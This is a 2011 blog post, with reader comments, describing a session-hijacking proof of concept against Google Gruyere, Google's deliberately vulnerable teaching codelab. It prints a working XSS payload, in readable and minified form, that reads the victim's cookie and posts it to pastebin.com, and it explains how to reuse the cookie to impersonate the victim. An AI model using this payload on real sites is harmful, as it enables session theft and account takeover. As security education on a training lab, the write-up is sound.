XSS Session Hijacking proof of concept
17 February, 2011 § 6 Comments
I’ve been spending time lately playing with Google Gruyere. I first got introduced to it back when it was called Jarlsberg. After finding all the cross-site scripting vulnerabilities, I thought it would be cool to actually exploit them.
To this day, I had never exploited any of the holes I had found. When disclosing security vulnerabilities, I knew of the potential that a hole could bring with it. While it would be easy to convince myself of the necessity for a fix, I’ve learned it’s much harder to convince others. So I set out on implementing a proof-of-concept for one of the holes in Google Gruyere.
Gruyere allows users to add links to their homepage, however the application doesn’t sanitize the input. Try the following as your homepage and you’ll get a nice alert dialog:
javascript:alert(1)
To exploit this, I wrote the following JavaScript:
function a() {
var xhr =new XMLHttpRequest();
var params = 'paste_code=' + document.cookie + '&paste_name=XSS_poc';
xhr.open("POST","http://pastebin.com/api_public.php",true);
xhr.setRequestHeader("Content-type","application/x-www-form-urlencoded");
xhr.setRequestHeader("Content-length",params.length + "");
xhr.setRequestHeader("Connection","close");
xhr.send(params);
}
a();
I then used the Google Closure Compiler to compress this JavaScript by over 18% and achieved the final code as follows:
var a=new XMLHttpRequest,b="paste_code="+document.cookie+"&paste_name=XSS_poc";a.open("POST","http://pastebin.com/api_public.php",true);a.setRequestHeader("Content-type","application/x-www-form-urlencoded");a.setRequestHeader("Content-length",b.length+"");a.setRequestHeader("Connection","close");a.send(b);
Prefix the JavaScript code with `javascript:`, and you’re off to the races.
So how does this work? This JavaScript, when executed, will take the document’s cookie and send it to Pastebin.com. The attacker will then visit pastebin.com and find the cookie by searching for “XSS_poc” on Pastebin.
I then used a Google Chrome extension called Edit This Cookie to change my cookie to be that of the victim. Hitting Refresh on the page now showed that I was logged in as the victim 🙂
I recorded a video of the attack and have embedded it below. The music was created by Kevin MacLeod.
What do you think?
JAWS 
[…] This post was mentioned on Twitter by d3v1l, 3y3s0n_1nf0 and Jorge Baeza, nu63x.krew. nu63x.krew said: RT @securityshell: Session Hijacking via XSS in Google Gruyere http://t.co/FJtLZGk […]
I think Google should use Nephtali 🙂
Now, seriously, that’s a pretty terrible flaw. Hopefully your post will lead to action.
Hey you should check out Gruyere! It’s a “codelab” written by Google to teach people about website security. They have different challenges to take part in and this was one of them.
Hah, I got caught!
I just read the title, scanned the text (“I’ve learned it’s much harder to convince others”), and watched the video (music was a nice touch.)
I assumed (yes, this is consistent with the negative phrase associated with “assume”) you were just blogging about somebodies app engine application that you’d used and found vulnerabilities within that weren’t addressed by the developer. Hah!
I was trying to crank out a quick comment before catching the weekend shows with my wife (we watch the online presentations of Castle, Chuck, How I met your mother, and Modern Family in a marathon session that represents all of our TV watching for the week.) That’ll teach me to rush (but the shows were all great.)
For the record, feel free to fuzz the Nephtali site anytime you want. If you find a vulnerability, I’ll buy you a lunch sometime.
Thanks a lot!
BTW, it seems that pastebin have changed their API – the request (as seen here) isn’t published to pastebin anymore.
Is it possible to send the cookie as a plaintext directly to the attacker’s IP?
Yeah definitely possible. The publish to pastebin was just an example of what somebody could do.